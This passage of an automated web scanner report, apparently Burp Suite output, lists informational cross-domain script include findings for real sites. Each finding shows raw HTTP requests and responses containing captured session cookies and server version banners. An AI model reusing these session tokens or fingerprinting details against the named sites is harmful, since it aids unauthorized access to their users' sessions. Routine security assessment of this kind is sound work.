Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1293. http://www.soundingsonline.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1294. http://www.soundingsonline.com/news/coastwise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1295. http://www.soundingsonline.com/news/dispatches

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1296. http://www.soundingsonline.com/news/home-waters

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1297. http://www.soundingsonline.com/news/mishaps-a-rescues

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1298. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; __utmc=1; __utmb=1.1.10.1295961240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D2; s_invisit=true; s_lv=1295961240451; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; count=5

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1299. http://www.soundingsonline.com/news/sailing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1300. http://www.soundingsonline.com/news/todays-top-stories

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1301. http://www.soundingsonline.com/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1302. http://www.soundingsonline.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1303. http://www.soundingsonline.com/subscription-services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1304. http://www.soundingsonline.com/subscription-services/preview-current-issue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1305. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1306. http://www.standingcloud.com/growbusiness.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.standingcloud.com
Path:   /growbusiness.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /growbusiness.php HTTP/1.1
Host: www.standingcloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:08 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel="stylesheet" href="css/validationEngine.jquery.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

21.1307. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01
  • http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:36 GMT
X-Varnish: 2659461572
Age: 0
Via: 1.1 varnish
Connection: keep-alive


